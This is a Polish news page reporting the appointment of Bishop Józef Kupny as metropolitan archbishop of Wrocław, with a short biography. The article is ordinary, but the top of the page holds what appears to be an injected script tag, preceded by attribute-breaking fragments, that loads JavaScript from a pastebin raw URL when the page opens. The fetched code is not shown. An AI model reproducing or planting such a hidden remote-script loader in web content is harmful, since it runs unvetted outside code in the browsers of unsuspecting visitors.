">

"> <script type="text/javascript" src="https://pastebin.com/raw/hUw8hjvb"></script></p>

Dzisiaj jest: poniedziałek,
19 listopada 2018r.

wykop.pl

Bp Józef Kupny metropolitą wrocławskim

 

Ojciec Święty przyjął rezygnację z funkcji metropolity wrocławskiego, złożoną ze względu na wiek przez abp. Mariana Gołębiewskiego. Na jego miejsce Papież mianował 57-letniego bp. Józefa Kupnego z Katowic. 

Nowy arcybiskup metropolita wrocławski pochodzi spod Piekar Śląskich (Dąbrówka Wielka). Po ukończeniu Wyższego Śląskiego Seminarium Duchownego w Krakowie otrzymał święcenia kapłańskie w 1983 r. Wcześniej w czasie studiów odbył zasadniczą służbę wojskową w specjalnej jednostce kleryckiej w Brzegu. Po święceniach pracował duszpastersko, jednocześnie studiując teologię pastoralną w katowickiej filii Akademii Teologii Katolickiej w Warszawie. Ks. Kupny kontynuował studia w zakresie nauk społecznych na Katolickim Uniwersytecie Lubelskim, gdzie następnie pracował naukowo. Wykładał także w Wyższym Śląskim Seminarium Duchownym w Katowicach, gdzie został rektorem w 2001 r. Cztery lata później Benedykt XVI mianował go biskupem pomocniczym archidiecezji katowickiej. Od 2006 r. był tam też wikariuszem generalnym.

W Konferencji Episkopatu Polski bp Kupny należy do Rady Stałej, przewodniczy Radzie ds. Społecznych oraz jest delegatem ds. Ruchów i Stowarzyszeń Katolickich. Był głównym autorem dokumentu społecznego episkopatu „W trosce o człowieka i dobro wspólne”, wydanego w ubiegłym roku.

tc/ r